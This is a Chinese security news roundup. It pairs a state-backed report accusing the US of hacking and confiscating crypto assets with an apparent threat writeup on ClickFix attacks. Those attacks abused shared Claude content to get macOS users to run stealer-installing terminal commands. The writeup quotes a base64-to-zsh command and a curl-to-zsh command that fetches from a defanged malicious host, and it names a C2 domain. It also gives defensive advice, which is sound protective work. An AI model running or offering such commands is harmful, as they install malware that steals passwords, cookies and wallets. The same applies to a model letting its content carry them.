美国发动网络攻击侵占全球虚拟资产,收割超300亿美元;|重大威胁:黑客滥用Claude发动ClickFix攻击,超万人已中招!
美国发动网络攻击侵占全球虚拟资产;
2026年2月26日,近期,中国国家计算机病毒应急处理中心、计算机病毒防治技术国家工程实验室以及360数字安全集团、安天科技集团股份有限公司联合发布报告《头号玩家”—— 美国技术霸权下的全球虚拟货币资产收割行动深层解析》,共同揭露了美国技术霸权下的全球虚拟货币资产收割行动。这究竟是怎么完成的?
报告指出,截至2026年1月底,全球虚拟货币总市值约2.73万亿美元,其中比特币市值达1.57万亿美元,规模相当于全球官方黄金储备总市值的47%。面对万亿级数字财富,美国凭借先发技术优势、产业聚集优势、完善法规体系与强大执法能力,构建“技术优势—法规绑定—机构执行”的三位一体体系,通过网络攻击、规则围堵、定向收割、远洋捕捞等手段,实现精准化、规模化的数字掠夺,严重侵害全球各国技术主权、经济利益与政治安全。
据不完全统计,2022年至2025年短短4年间,美国通过各类案件累计没收全球虚拟货币资产价值超300亿美元。
报告称,众所周知,作为名副其实的“黑客帝国”,美国拥有全球最庞大的国家级黑客力量。2023年至2025年,具有美国政府支持背景的黑客组织针对全球20余家主流虚拟货币资产交易所发起定向攻击,攻击手段包括植入后门、鱼叉钓鱼、供应链渗透等,重点窃取用户钱包私钥、平台交易流水及合规监管信息,攻击目标覆盖亚洲、欧洲、非洲多个国家和地区的平台。从时间线比对来看,部分攻击行动与美国司法部、OFAC等部门针对虚拟资产领域的执法行动存在关联性。
美国通过技术霸权收割全球虚拟资产,本质是为了维护其经济霸权与美元地位。一方面,通过没收、罚款等方式直接掠夺全球财富,补充国内经济实力;另一方面,通过掌控虚拟资产监管规则与交易流向,将数字金融体系纳入美元主导的全球金融框架,遏制其他国家通过虚拟货币资产绕开美元结算的尝试。对于非法攫取的比特币,美国政府通过公开拍卖来变现资产,获利巨大。
对于2013年美国联邦调查局(FBI)关闭暗网交易平台“丝绸之路”一案收缴的比特币,从2014年至2025年1月历时10多年陆续拍卖完毕,收益就超过了100亿美元。根据美国国内《资产没收激励计划》,其部分收入成为执法部门的“红利”,而大部分则纳入联邦财政收入。
报告引用美国司法部的数据显示,通过虚拟资产领域的执法行动,每年可增加数百亿美元的财政收入,同时强化了全球虚拟货币资产交易对美元的依赖,进一步巩固了美元的国际货币地位。
“事实上,已拍卖变现的比特币只是其强取豪夺来的九牛一毛,更多的成为战略比特币储备。美国政府企图通过掌控‘数字黄金’来对冲全球去美元化趋势。美国凭借技术层面的霸权地位对全球虚拟资产进行收割,其根本目的在于巩固自身的经济霸权以及美元的国际地位。”安天科技集团股份有限公司创始人肖新光介绍。
该报告总结称,本文系统性揭示了美国政府以技术霸权为依托,以金融创新为掩护,以虚拟货币资产为载体,以维系和升级美元霸权体系为目标,以继续收割全世界为根本目的的险恶图谋。对于虚拟货币,中国人民银行明确指出,虚拟货币不具有与法定货币等同的法律地位,不具有法偿性,不应且不能作为货币在市场上流通使用,虚拟货币相关业务活动属于非法金融活动。
黑客滥用Claude发动ClickFix攻击,超万人已中招!
导语:安全研究人员发现,攻击者正滥用Anthropic的Claude平台发起ClickFix攻击,诱导macOS用户在终端执行恶意命令。已有超过1.5万次浏览的恶意教程页面在野外传播。继ChatGPT、Grok之后,AI平台再次成为恶意软件分发的温床。
一、攻击手法:精心设计的诱导链
第一步:SEO投毒
攻击者通过谷歌广告,针对特定关键词进行恶意推广:
- "在线DNS解析器"
- "macOS命令行磁盘空间分析工具"
- "HomeBrew"
第二步:跳转至Claude内容
搜索结果将用户引导至:
- 公开的Claude共享内容 —— 由用户生成的"教程"
- 伪造的苹果官方支持页面 —— 托管在Medium上
这些页面提示用户:"要解决问题,请在终端执行以下命令..."
第三步:诱导执行恶意命令
攻击者提供的命令示例:
变体一:
echo"..." | base64 -D | zsh
变体二:
true && curl -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh
二、MacSync木马:功能强大的窃密工具
恶意行为
研究显示,该木马具备以下能力:
| 功能 | 说明 |
|---|---|
| 钥匙串窃取 | 获取macOS钥匙串中存储的所有密码 |
| 浏览器数据 | 窃取Safari、Chrome等浏览器的密码、Cookie、历史记录 |
| 加密货币钱包 | 针对MetaMask等钱包进行窃取 |
| 屏幕录制 | 可录制用户屏幕获取敏感信息 |
| 环境监听 | 捕获设备周围的对话(通过麦克风) |
| 命令与控制 | 连接C2服务器a2abotnet[.]com |
隐蔽性特征
- 使用硬编码令牌连接C2,伪装成正常流量
- 通过AppleScript执行窃取行为
- 数据打包上传失败后,会分割重试8次
- 上传成功后自动清理痕迹
三、攻击规模与影响
浏览量惊人
- 恶意Claude教程页面:15,600+ 次浏览
- 且数字还在增长(几天前观测为12,300次)
高价值目标
macOS用户通常是:
- 企业高管
- 开发者
- 设计从业者
- 加密货币投资者
这些用户往往拥有更高的账户价值。
四、为什么会中招?
利用用户信任
- 对AI平台的信任 —— 用户认为Claude生成的内容是可信的
- 对教程的盲从 —— 看到"教程"二字便放松警惕
- 技术盲区 —— 不理解base64解码和管道执行的风险
利用搜索引擎
通过SEO投毒,让恶意链接出现在搜索结果前列,增加被点击的概率。
五、如何识别与防护
识别恶意命令的特征
危险的信号:
- 包含 base64 -D(解码后执行隐藏内容)
- 包含 curl ... | bash/zsh(下载后立即执行)
- 要求复制不明代码到终端
- 声称"修复系统问题"或"安装必要组件"
macOS用户防护建议
- 绝不执行看不懂的命令 —— 特别是带管道的复杂命令
- 向AI二次确认 —— 在同一对话中问"这条命令安全吗?"
- 验证来源 —— 只从官方渠道下载软件
- 启用Gatekeeper —— 不要绕过安全警告
- 定期审查钥匙串 —— 检查是否有异常条目
企业级防护
- 监控终端命令执行,特别是base64解码和curl管道
- 部署EDR,检测MacSync等已知木马
- 限制用户权限,避免管理员身份日常操作
- 安全意识培训,重点防范"教程类"社会工程
六、平台责任与应对
Claude/Anthropic的处境
- 共享内容由用户生成,平台难以事前审核所有内容
- 已添加风险提示:"内容由用户生成,未经准确性验证"
- 需要加强异常内容检测机制
这不是孤例
此前已有攻击利用:
- ChatGPT 对话分享功能分发AMOS木马
- Grok 平台传播恶意软件
AI内容平台的安全性正在面临严峻考验。
结语:AI时代的安全新挑战
当AI让内容生成变得极其便捷时,恶意内容的生产也同样便捷了。
ClickFix攻击揭示了一个残酷现实:攻击者比防御者更快适应AI时代。
对于macOS用户,请牢记:终端是系统的最高权限入口,任何要求复制命令到终端的"教程"都值得高度警惕。当AI成为攻击者的传播工具,保持清醒的怀疑态度,是最好的防御。
本文基于公开安全研究报告整理,仅供参考。
文章来源 :中国经营报、安全学习那些事儿
官方 